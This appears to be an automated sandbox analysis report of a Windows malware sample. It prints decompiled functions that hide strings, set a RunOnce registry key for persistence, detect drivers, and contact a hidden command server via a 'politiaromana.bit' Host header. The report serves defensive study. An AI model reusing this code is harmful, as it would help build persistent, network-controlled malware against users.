                                    				_a52 = 0x6f002e;
                                    				_a56 = 0x670072;
                                    				_a60 = 0x64002f;
                                    				_a64 = 0x77006f;
                                    				_a68 = 0x6c006e;
                                    				_a72 = 0x61006f;
                                    				_a76 = 0x2f0064;
                                    				_a80 = 0x6f0064;
                                    				_a84 = 0x6e0077;
                                    				_a88 = 0x6f006c;
                                    				_a92 = 0x640061;
                                    				_a96 = 0x65002d;
                                    				_a100 = 0x730061;
                                    				_a104 = 0x2e0079;
                                    				_a108 = 0x740068;
                                    				_a112 = 0x6c006d;
                                    				_a116 = 0x65002e;
                                    				_a120 = 0x6e;
                                    				if( *0xf592a44 == 0) {
                                    					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                    					 *0xf592a44 = _t45;
                                    					if(_t45 != 0) {
                                    						wsprintfW(_t45, L"%s",  &_a8);
                                    					}
                                    				}
                                    				VirtualFree(_a128, 0, 0x8000); // executed
                                    				_t44 = E0F587D70( &_a136);
                                    				return _t44;
                                    			}














                                    0x0f5843a6
                                    0x0f5843b0
                                    0x0f5843b0
                                    0x0f5843b7
                                    0x0f5843b8
                                    0x0f5843c4
                                    0x0f5843d8
                                    0x0f5843dc
                                    0x0f5843e0
                                    0x0f5843e0
                                    0x0f5843e2
                                    0x0f5843f4
                                    0x0f5843f8
                                    0x0f5843fd
                                    0x0f584406
                                    0x00000000
                                    0x00000000
                                    0x0f58440a
                                    0x0f58440d
                                    0x0f584413
                                    0x0f584413
                                    0x0f58441b
                                    0x00000000
                                    0x0f584420
                                    0x0f584420
                                    0x0f584420
                                    0x0f584426
                                    0x00000000
                                    0x00000000
                                    0x0f584430
                                    0x0f584432
                                    0x0f58443d
                                    0x0f584441
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f584434
                                    0x0f584434
                                    0x0f58443b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f58443b
                                    0x00000000
                                    0x0f584432
                                    0x0f58459e
                                    0x00000000
                                    0x0f58459e
                                    0x00000000
                                    0x0f584447
                                    0x0f584447
                                    0x0f584447
                                    0x0f58444b
                                    0x0f58444e
                                    0x0f584451
                                    0x00000000
                                    0x0f584413
                                    0x0f5843e0
                                    0x0f584456
                                    0x0f58445d
                                    0x0f584465
                                    0x0f58446d
                                    0x0f584475
                                    0x0f58447d
                                    0x0f584485
                                    0x0f58448d
                                    0x0f584495
                                    0x0f58449d
                                    0x0f5844a5
                                    0x0f5844ad
                                    0x0f5844b5
                                    0x0f5844bd
                                    0x0f5844c5
                                    0x0f5844cd
                                    0x0f5844d5
                                    0x0f5844dd
                                    0x0f5844e5
                                    0x0f5844ed
                                    0x0f5844f5
                                    0x0f5844fd
                                    0x0f584505
                                    0x0f58450d
                                    0x0f584515
                                    0x0f58451d
                                    0x0f584525
                                    0x0f58452d
                                    0x0f584535
                                    0x0f58453d
                                    0x0f584545
                                    0x0f584555
                                    0x0f58455b
                                    0x0f584562
                                    0x0f58456f
                                    0x0f584575
                                    0x0f584562
                                    0x0f584586
                                    0x0f584593
                                    0x0f58459d

                                    APIs
                                    • lstrcpyW.KERNEL32 ref: 0F5843E2
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F5843E9
                                    • VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0F584555
                                    • wsprintfW.USER32 ref: 0F58456F
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F584586
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                    • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                    • API String ID: 4033391921-3341315666
                                    • Opcode ID: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
                                    • Instruction ID: 0d40faeccb505d06215e6cf63961f3fbd80ded84db50686b87d8619f31c442a3
                                    • Opcode Fuzzy Hash: cd9fbc8736e4a6bb610ac8dcb7ce18b7454ce6593b025f8965148a857e689544
                                    • Instruction Fuzzy Hash: B441A270509341DBD724EF10D54832ABFE2FB80759F50492CFA886B262D7FA859ACF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 94%
                                    			E0F582960(WCHAR* __ecx, void* __eflags) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				short _v32;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				short _v140;
                                    				long _t45;
                                    				WCHAR* _t58;
                                    
                                    				_t58 = __ecx;
                                    				_v32 = 0x520050;
                                    				_v28 = 0x440049;
                                    				_push(0x41);
                                    				_v24 = 0x520055;
                                    				_v20 = 0x530041;
                                    				_v16 = 0x4b0048;
                                    				_v12 = 0x41;
                                    				E0F5882B0( &_v32, lstrlenW( &_v32)); // executed
                                    				_v140 = 0x4f0053;
                                    				_v136 = 0x540046;
                                    				_v132 = 0x410057;
                                    				_v128 = 0x450052;
                                    				_v124 = 0x4d005c;
                                    				_v120 = 0x630069;
                                    				_v116 = 0x6f0072;
                                    				_v112 = 0x6f0073;
                                    				_v108 = 0x740066;
                                    				_v104 = 0x57005c;
                                    				_v100 = 0x6e0069;
                                    				_v96 = 0x6f0064;
                                    				_v92 = 0x730077;
                                    				_v88 = 0x43005c;
                                    				_v84 = 0x720075;
                                    				_v80 = 0x650072;
                                    				_v76 = 0x74006e;
                                    				_v72 = 0x650056;
                                    				_v68 = 0x730072;
                                    				_v64 = 0x6f0069;
                                    				_v60 = 0x5c006e;
                                    				_v56 = 0x750052;
                                    				_v52 = 0x4f006e;
                                    				_v48 = 0x63006e;
                                    				_v44 = 0x65;
                                    				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
                                    				if(_t45 != 0) {
                                    					return 0;
                                    				} else {
                                    					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
                                    					asm("sbb esi, esi"); // executed
                                    					RegCloseKey(_v8);
                                    					_t39 =  &(_t58[0]); // 0x1
                                    					return _t39;
                                    				}
                                    			}





































                                    0x0f58296b
                                    0x0f58296d
                                    0x0f582979
                                    0x0f582980
                                    0x0f582984
                                    0x0f58298c
                                    0x0f582993
                                    0x0f58299a
                                    0x0f5829a8
                                    0x0f5829b0
                                    0x0f5829bd
                                    0x0f5829c7
                                    0x0f5829ce
                                    0x0f5829eb
                                    0x0f5829f8
                                    0x0f5829ff
                                    0x0f582a06
                                    0x0f582a0d
                                    0x0f582a14
                                    0x0f582a1b
                                    0x0f582a22
                                    0x0f582a29
                                    0x0f582a30
                                    0x0f582a37
                                    0x0f582a3e
                                    0x0f582a45
                                    0x0f582a4c
                                    0x0f582a53
                                    0x0f582a5a
                                    0x0f582a61
                                    0x0f582a68
                                    0x0f582a6f
                                    0x0f582a76
                                    0x0f582a7d
                                    0x0f582a84
                                    0x0f582a8c
                                    0x0f582ac7
                                    0x0f582a8e
                                    0x0f582aa4
                                    0x0f582aaf
                                    0x0f582ab1
                                    0x0f582ab7
                                    0x0f582abf
                                    0x0f582abf

                                    APIs
                                    • lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0F58299D
                                      • Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
                                      • Part of subcall function 0F5882B0: VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0F5882FB
                                      • Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
                                      • Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
                                      • Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
                                      • Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
                                      • Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
                                    • RegCreateKeyExW.KERNELBASE(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F582C45,00000000), ref: 0F582A84
                                    • lstrlenW.KERNEL32(00000000), ref: 0F582A8F
                                    • RegSetValueExW.KERNELBASE(0F582C45,00520050,00000000,00000001,00000000,00000000), ref: 0F582AA4
                                    • RegCloseKey.KERNELBASE(0F582C45), ref: 0F582AB1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                    • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                    • API String ID: 553367697-3791882466
                                    • Opcode ID: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
                                    • Instruction ID: 078393bbf2970ad8433ee405127a8ced7b1603c5e7f52df8b3d54107fc9dd902
                                    • Opcode Fuzzy Hash: 3b3f2971afce78b4317862d047c3f8e00acbc6d995383461f027ecabc2b9d2fb
                                    • Instruction Fuzzy Hash: DA31D9B090021DEFEB20CF91E948BEDBFB9FB01709F508119D6187A281D7BA49499F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 85%
                                    			E0F582D30() {
                                    				struct _WNDCLASSEXW _v52;
                                    				struct tagMSG _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				char _v96;
                                    				void* _t37;
                                    				short _t42;
                                    				void* _t49;
                                    				void* _t59;
                                    				void* _t60;
                                    				void* _t61;
                                    				void* _t62;
                                    				void* _t67;
                                    				void* _t69;
                                    				long _t71;
                                    
                                    				_push(_t62);
                                    				_push(_t69);
                                    				_v84.message = 0x6c006b;
                                    				_push(_t67);
                                    				_v84.wParam = 0x660069;
                                    				_v84.lParam = 0x73002e;
                                    				_v84.time = 0x730079;
                                    				_v84.pt = 0;
                                    				_v96 = 0x6c006b;
                                    				_v92 = 0x2e0031;
                                    				_v88 = 0x790073;
                                    				_v84.hwnd = 0x73;
                                    				_t37 = E0F582F50( &(_v84.message)); // executed
                                    				if(_t37 != 0) {
                                    					L5:
                                    					_v52.cbSize = 0x30;
                                    					_v52.style = 3;
                                    					_v52.lpfnWndProc = E0F582C50;
                                    					_v52.cbClsExtra = 0;
                                    					_v52.cbWndExtra = 0;
                                    					_v52.hInstance = GetModuleHandleW(0);
                                    					_v52.hIcon = 0;
                                    					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                    					_v52.hbrBackground = 6;
                                    					_v52.lpszMenuName = 0;
                                    					_v52.lpszClassName = L"win32app";
                                    					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
                                    					_t42 = RegisterClassExW( &_v52);
                                    					_push(0);
                                    					if(_t42 != 0) {
                                    						GetModuleHandleW();
                                    						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                    						SetWindowLongW(_t71, 0xfffffff0, 0);
                                    						if(_t71 != 0) {
                                    							ShowWindow(_t71, 5);
                                    							UpdateWindow(_t71);
                                    							_t49 = CreateThread(0, 0, E0F582D10, _t71, 0, 0);
                                    							if(_t49 != 0) {
                                    								CloseHandle(_t49);
                                    							}
                                    							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
                                    								L15:
                                    								ExitThread(0);
                                    							} else {
                                    								do {
                                    									TranslateMessage( &_v84);
                                    								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                    								goto L15;
                                    							}
                                    						}
                                    						ExitThread(_t71);
                                    					}
                                    					ExitThread();
                                    				}
                                    				_t59 = E0F582F50( &_v96); // executed
                                    				if(_t59 != 0) {
                                    					goto L5;
                                    				}
                                    				_v84.message = 0x730066;
                                    				_v84.wParam = 0x660064;
                                    				_v84.lParam = 0x2e0077;
                                    				_v84.time = 0x790073;
                                    				_v84.pt = 0x73;
                                    				_t60 = E0F582F50( &(_v84.message)); // executed
                                    				if(_t60 != 0) {
                                    					goto L15;
                                    				}
                                    				_t61 = E0F5830A0(_t62, _t67, _t69); // executed
                                    				if(_t61 != 0) {
                                    					goto L15;
                                    				}
                                    				_push(_t61); // executed
                                    				E0F582AD0(); // executed
                                    				goto L5;
                                    			}


















                                    0x0f582d39
                                    0x0f582d3a
                                    0x0f582d3d
                                    0x0f582d45
                                    0x0f582d4a
                                    0x0f582d52
                                    0x0f582d5a
                                    0x0f582d62
                                    0x0f582d67
                                    0x0f582d6f
                                    0x0f582d77
                                    0x0f582d7f
                                    0x0f582d87
                                    0x0f582d8e
                                    0x0f582de9
                                    0x0f582df1
                                    0x0f582df9
                                    0x0f582e01
                                    0x0f582e09
                                    0x0f582e11
                                    0x0f582e22
                                    0x0f582e26
                                    0x0f582e3d
                                    0x0f582e41
                                    0x0f582e49
                                    0x0f582e51
                                    0x0f582e5f
                                    0x0f582e68
                                    0x0f582e6e
                                    0x0f582e73
                                    0x0f582e7b
                                    0x0f582eaf
                                    0x0f582eb4
                                    0x0f582ebc
                                    0x0f582ec8
                                    0x0f582ecf
                                    0x0f582ee3
                                    0x0f582eeb
                                    0x0f582eee
                                    0x0f582eee
                                    0x0f582f09
                                    0x0f582f3d
                                    0x0f582f3f
                                    0x0f582f0b
                                    0x0f582f17
                                    0x0f582f1c
                                    0x0f582f25
                                    0x00000000
                                    0x0f582f17
                                    0x0f582f09
                                    0x0f582ebf
                                    0x0f582ebf
                                    0x0f582e75
                                    0x0f582e75
                                    0x0f582d94
                                    0x0f582d9b
                                    0x00000000
                                    0x00000000
                                    0x0f582da1
                                    0x0f582da9
                                    0x0f582db1
                                    0x0f582db9
                                    0x0f582dc1
                                    0x0f582dc9
                                    0x0f582dd0
                                    0x00000000
                                    0x00000000
                                    0x0f582dd6
                                    0x0f582ddd
                                    0x00000000
                                    0x00000000
                                    0x0f582de3
                                    0x0f582de4
                                    0x00000000

                                    APIs
                                      • Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74
                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F582E19
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0F582E2E
                                    • LoadIconW.USER32 ref: 0F582E59
                                    • RegisterClassExW.USER32 ref: 0F582E68
                                    • ExitThread.KERNEL32 ref: 0F582E75
                                      • Part of subcall function 0F582F50: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0F582F8D
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582E7B
                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F582E81
                                    • CreateWindowExW.USER32 ref: 0F582EA7
                                    • SetWindowLongW.USER32 ref: 0F582EB4
                                    • ExitThread.KERNEL32 ref: 0F582EBF
                                      • Part of subcall function 0F582F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F582FA8
                                      • Part of subcall function 0F582F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F582FCF
                                      • Part of subcall function 0F582F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F582FE3
                                      • Part of subcall function 0F582F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F582FFA
                                    • ExitThread.KERNEL32 ref: 0F582F3F
                                      • Part of subcall function 0F582AD0: VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000040), ref: 0F582AEA
                                      • Part of subcall function 0F582AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
                                      • Part of subcall function 0F582AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
                                      • Part of subcall function 0F582AD0: ExitThread.KERNEL32 ref: 0F582C47
                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F582EC8
                                    • UpdateWindow.USER32(00000000), ref: 0F582ECF
                                    • CreateThread.KERNEL32 ref: 0F582EE3
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F582EEE
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F05
                                    • TranslateMessage.USER32(?), ref: 0F582F1C
                                    • DispatchMessageW.USER32 ref: 0F582F23
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F582F37
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                    • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                    • API String ID: 3011903443-520298170
                                    • Opcode ID: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
                                    • Instruction ID: 142506e2248bef634949804d404099a8f810a23c99f06cee0db32062ad680c9c
                                    • Opcode Fuzzy Hash: 7ca1dd81af2d706045ad173d30e6494b3e96b2b45e931c7544a64208065e8542
                                    • Instruction Fuzzy Hash: 27515E70648301AFE310AF618D49B5B7FE4BF44B55F10492DF684BA281E7B8A14BCF96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 100%
                                    			E0F588050(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
                                    				long _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				short _v68;
                                    				void* _t38;
                                    				void* _t40;
                                    				WCHAR* _t41;
                                    				long _t54;
                                    				long _t59;
                                    				WCHAR* _t62;
                                    				void* _t63;
                                    				void* _t64;
                                    				void* _t65;
                                    				void* _t67;
                                    
                                    				_t64 = __ecx;
                                    				_t38 =  *(__ecx + 4);
                                    				if(_t38 != 0) {
                                    					InternetCloseHandle(_t38);
                                    				}
                                    				E0F587E40(_t64); // executed
                                    				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0); // executed
                                    				_t65 = _t40;
                                    				_v12 = 0;
                                    				_v16 = _t65;
                                    				if(_t65 != 0) {
                                    					_t41 = VirtualAlloc(0, 0x2800, 0x3000, 0x40); // executed
                                    					_t62 = _t41;
                                    					_v20 = _t62;
                                    					wsprintfW(_t62, L"%s", _a8);
                                    					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
                                    					if(_t63 != 0) {
                                    						_v68 = 0x6f0048;
                                    						_v64 = 0x740073;
                                    						_v60 = 0x20003a;
                                    						_v56 = 0x6f0070;
                                    						_v52 = 0x69006c;
                                    						_v48 = 0x690074;
                                    						_v44 = 0x720061;
                                    						_v40 = 0x6d006f;
                                    						_v36 = 0x6e0061;
                                    						_v32 = 0x2e0061;
                                    						_v28 = 0x690062;
                                    						_v24 = 0x74;
                                    						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
                                    							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
                                    								GetLastError();
                                    							} else {
                                    								_t67 = _a20;
                                    								_t59 = _a24 - 1;
                                    								_a4 = 0;
                                    								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                    									while(1) {
                                    										_t54 = _a4;
                                    										if(_t54 == 0) {
                                    											goto L13;
                                    										}
                                    										 *((char*)(_t54 + _t67)) = 0;
                                    										_a4 = 0;
                                    										_v12 = 1;
                                    										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
                                    											continue;
                                    										} else {
                                    										}
                                    										goto L13;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					L13:
                                    					InternetCloseHandle(_t63); // executed
                                    					InternetCloseHandle(_v16);
                                    					VirtualFree(_v20, 0, 0x8000); // executed
                                    					return _v12;
                                    				} else {
                                    					return _t40;
                                    				}
                                    			}




























                                    0x0f588058
                                    0x0f58805b
                                    0x0f588060
                                    0x0f588063
                                    0x0f588063
                                    0x0f58806b
                                    0x0f588082
                                    0x0f588088
                                    0x0f58808a
                                    0x0f588091
                                    0x0f588096
                                    0x0f5880af
                                    0x0f5880b8
                                    0x0f5880c0
                                    0x0f5880c3
                                    0x0f5880e7
                                    0x0f5880eb
                                    0x0f5880f8
                                    0x0f588101
                                    0x0f588108
                                    0x0f58810f
                                    0x0f588116
                                    0x0f58811d
                                    0x0f588124
                                    0x0f58812b
                                    0x0f588132
                                    0x0f588139
                                    0x0f588140
                                    0x0f588147
                                    0x0f588156
                                    0x0f58816d
                                    0x0f5881bc
                                    0x0f58816f
                                    0x0f588175
                                    0x0f588178
                                    0x0f58817d
                                    0x0f58818c
                                    0x0f588190
                                    0x0f588190
                                    0x0f588195
                                    0x00000000
                                    0x00000000
                                    0x0f588197
                                    0x0f5881a2
                                    0x0f5881a9
                                    0x0f5881b8
                                    0x00000000
                                    0x00000000
                                    0x0f5881ba
                                    0x00000000
                                    0x0f5881b8
                                    0x0f588190
                                    0x0f58818c
                                    0x0f58816d
                                    0x0f588156
                                    0x0f5881c2
                                    0x0f5881c9
                                    0x0f5881ce
                                    0x0f5881da
                                    0x0f5881e9
                                    0x0f58809e
                                    0x0f58809e
                                    0x0f58809e

                                    APIs
                                    • InternetCloseHandle.WININET(?), ref: 0F588063
                                    • InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F588082
                                    • VirtualAlloc.KERNELBASE(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0F587046,ipv4bot.whatismyipaddress.com,0F58FF90), ref: 0F5880AF
                                    • wsprintfW.USER32 ref: 0F5880C3
                                    • HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0F5880E1
                                    • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0F58814E
                                    • HttpSendRequestW.WININET(00000000,00690074,0069006C,00000000,00000074), ref: 0F588165
                                    • InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F588184
                                    • InternetReadFile.WININET(00000000,00690062,002E0060,00000000), ref: 0F5881B0
                                    • GetLastError.KERNEL32 ref: 0F5881BC
                                    • InternetCloseHandle.WININET(00000000), ref: 0F5881C9
                                    • InternetCloseHandle.WININET(00000000), ref: 0F5881CE
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F587046), ref: 0F5881DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
                                    • String ID: :$H$HTTP/1.1$a$a$a$b$l$o$p$s$t$t
                                    • API String ID: 3906118045-2187218134
                                    • Opcode ID: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
                                    • Instruction ID: fb9741fe322c9d45a71f587c5887f673f2e20cb36e725705d743cf1e3b9af782
                                    • Opcode Fuzzy Hash: 8684f8d27a1ee71770d5e59dfc2ae87e9384fe62cf759b6ff1a5f74f0eca0e74
                                    • Instruction Fuzzy Hash: 6341B430600208BBEB109F51DC48FEE7FB9FF04B55F504119F904B6281C7B99956DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 362 f587b70-f587c0a VirtualAlloc * 2 363 f587c0c-f587c22 CreateToolhelp32Snapshot 362->363 364 f587c32-f587c3a 362->364 365 f587c3d-f587c57 Process32FirstW 363->365 366 f587c24-f587c2c VirtualFree 363->366 367 f587d2d-f587d4b VirtualFree FindCloseChangeNotification 365->367 368 f587c5d 365->368 366->364 370 f587d4d-f587d55 VirtualFree 367->370 371 f587d57-f587d5f 367->371 369 f587c60-f587c62 368->369 372 f587c68-f587c6b 369->372 373 f587d07-f587d0b 369->373 370->371 376 f587c70-f587c7d 372->376 374 f587d0d-f587d13 373->374 375 f587d25-f587d2b 373->375 374->375 377 f587d15-f587d20 lstrlenW 374->377 375->367 379 f587c8a-f587c98 376->379 380 f587c7f-f587c83 376->380 377->375 382 f587c9a-f587cad lstrcpyW lstrcatW 379->382 383 f587caf-f587cbe lstrcatW * 2 379->383 380->376 381 f587c85-f587c88 380->381 384 f587ce7-f587cf6 Process32NextW 381->384 385 f587cc0-f587ce4 lstrlenW 382->385 383->385 384->373 386 f587cf8-f587d01 GetLastError 384->386 385->384 386->369 386->373
                                    C-Code - Quality: 80%
                                    			E0F587B70(void** _a4, intOrPtr* _a8) {
                                    				signed int _v8;
                                    				long _v12;
                                    				long _v16;
                                    				void* _v20;
                                    				void* _v24;
                                    				WCHAR* _v28;
                                    				WCHAR* _v32;
                                    				WCHAR* _v36;
                                    				WCHAR* _v40;
                                    				WCHAR* _v44;
                                    				WCHAR* _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				WCHAR* _v60;
                                    				WCHAR* _v64;
                                    				WCHAR* _v68;
                                    				WCHAR* _v72;
                                    				WCHAR* _v76;
                                    				WCHAR* _v80;
                                    				void* _t46;
                                    				void* _t47;
                                    				void* _t49;
                                    				int _t50;
                                    				WCHAR* _t56;
                                    				int _t63;
                                    				void** _t68;
                                    				void* _t75;
                                    				long _t76;
                                    				WCHAR* _t77;
                                    				signed int _t79;
                                    				void* _t83;
